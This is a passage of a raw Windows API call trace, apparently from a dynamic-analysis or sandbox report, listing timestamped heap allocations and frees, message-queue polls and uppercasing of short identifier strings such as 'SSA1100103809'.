RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0204.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0204.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0204.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0204.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0204.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0204.769] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0204.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0204.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0204.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0204.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0204.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0204.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0204.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0204.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0204.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.773] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0204.773] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0204.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0204.774] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0204.774] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0204.774] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0204.774] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa98 [0204.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0204.775] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0204.776] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0204.776] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0204.776] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0204.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0204.777] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0204.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0204.777] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0204.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0204.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9d8 [0204.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74478 [0204.778] 